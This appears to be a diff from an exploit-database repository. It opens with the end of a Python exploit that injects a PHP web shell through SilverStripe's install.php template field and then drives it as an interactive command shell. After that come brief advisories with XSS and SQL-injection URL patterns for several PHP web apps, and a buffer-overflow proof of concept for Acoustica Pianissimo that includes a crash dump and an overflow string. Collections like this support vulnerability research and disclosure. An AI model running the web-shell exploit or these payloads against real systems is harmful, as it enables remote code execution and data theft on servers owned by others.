payload+='=@$_GET["gelen"]; echo shell_exec($gelen);?>'
parametreler = urllib.urlencode({'db[type]':'MySQLDatabase',
'db[MySQLDatabase][server]':'localhost',
'db[MySQLDatabase][username]':'root',
'db[MySQLDatabase][password]':'qwe123',
'db[MySQLDatabase][database]':'SS_mysite',
'db[MSSQLDatabase][server]':'localhost',
'db[MSSQLDatabase][username]':'root',
'db[MSSQLDatabase][password]':'qwe123',
'db[MSSQLDatabase][database]':'SS_mysite',
'db[PostgreSQLDatabase][server]':'localhost',
'db[PostgreSQLDatabase][username]':'root',
'db[PostgreSQLDatabase][password]':'qwe123',
'db[PostgreSQLDatabase][database]':'SS_mysite',
'db[SQLiteDatabase][path]':'/var/www/SilverStripe/assets/.db',
'db[SQLiteDatabase][database]':'SS_mysite',
'admin[username]':'admin',
'admin[password]':'qwe123',
'locale':'en_US',
'template':payload,
'stats':'on',
'go':'Installing SilverStripe...'})
print " [+]Parametreler olusturuldu [ Params Generated For Http Request ]"
basliklar = {"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain",
"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":"en-us,en;q=0.5",
"Accept-Encoding":"gzip, deflate",
"Connection":"keep-alive",
"Referer":"http://" + host + path+"install.php",
"Cookie":"alc_enc=1%3Aa9dbf14198a8f6bd9dd2d2c3e41e7164fb206d76; PastMember=1; PHPSESSID=0d7k4e661jd96i0u64vij68am3; phpbb3_srzvs_k=; phpbb3_srzvs_u=2; phpbb3_srzvs_sid=ede0a17fc1f375d6a633f291119c92d7; style_cookie=null; PHPSESSID=j7nr6uro3jc5tulodfeoum3u90; fws_cust=mince%232%23d41d8cd98f00b204e9800998ecf8427e"
}
print " [+]Basliklar olusturuldu [ Headers Generated For Http Request ]"
conn = httplib.HTTPConnection("localhost:80")
conn.request("POST",str(path) +"install.php",parametreler,basliklar)
responce = conn.getresponse()
if responce.status != 200:
print "[+]Http Hatasi : " + responce.status + "\n"
print "Cant Exploit!:("
if responce.status == 200:
komut=""
while( komut != "exit" ):
komut = urllib.quote_plus(str(raw_input("Shell :) => ")))
print urllib2.urlopen("http://" + host + path+"shellcik.php?gelen="+komut).read()

9
platforms/php/webapps/37118.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53291/info
SKYUC is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
SKYUC 3.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/search.php?encode=[XSS]

7
platforms/php/webapps/37120.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/53295/info
Uiga FanClub is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[Patch]/index2.php?c=1&p=[SQL]

9
platforms/php/webapps/37122.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53301/info
PHP Volunteer Management is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Volunteer Management 1.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/mods/messages/data/get_messages.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10

7
platforms/php/webapps/37123.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/53302/info
The WPsc MijnPress for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/wp-content/plugins/wp-content/plugins/wpsc-mijnpress/mijnpress_plugin_framework.php?rwflush=[xss]

73
platforms/windows/dos/37124.txt Executable file
View file

@ -0,0 +1,73 @@
Acoustica Pianissimo 1.0 Build 12 (Registration ID) Buffer Overflow PoC
Vendor: Acoustica, Inc.
Product web page: http://www.acoustica.com
Affected version: 1.0 Build 12
Summary: Pianissimo virtual piano uses a combination of sample
playback and advanced physical modeling to create a stunning
acoustic grand piano sound. Starting with 250 MB of high quality
samples of a Steinway™ Model D grand piano, Pianissimo uses
complex signal processing and programming to recreate the warmth,
response, and playability of a real grand piano.
Desc: The vulnerability is caused due to a boundary error in the
processing of a user input in the registration id field of the
registration procedure, which can be exploited to cause a buffer
overflow when a user inserts long array of string for the ID.
Successful exploitation could allow execution of arbitrary code
on the affected machine.
-----------------------------------------------------------------
(b98.1790): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\VST\Pianissimo\Pianissimo.dll -
eax=00000000 ebx=532d0245 ecx=bdeec3ea edx=00000049 esi=4a18d43c edi=06c07739
eip=061fbda7 esp=00184a28 ebp=4d2d0276 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
Pianissimo!CRefObj::SeekToData+0x4127:
061fbda7 8b86dc200000 mov eax,dword ptr [esi+20DCh] ds:002b:4a18f518=????????
0:000> d esp-1000
00183a28 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a38 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a48 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a58 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a68 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a78 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a88 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a98 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0:000> u 061fbda7
Pianissimo!CRefObj::SeekToData+0x4127:
061fbda7 8b86dc200000 mov eax,dword ptr [esi+20DCh]
061fbdad 50 push eax
061fbdae 6a30 push 30h
061fbdb0 681cc52c06 push offset Pianissimo!CRefObj::Tell+0x45bfc (062cc51c)
061fbdb5 6810c52c06 push offset Pianissimo!CRefObj::Tell+0x45bf0 (062cc510)
061fbdba e841f8ffff call Pianissimo!CRefObj::SeekToData+0x3980 (061fb600)
061fbdbf 83c410 add esp,10h
061fbdc2 8ac3 mov al,bl
-----------------------------------------------------------------
Tested on: Microsoft Windows 7 Professional SP1 (EN) 32/64bit
Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5243
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5243.php
16.03.2015
--
900 bytes:
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
11111-11111-11111-11111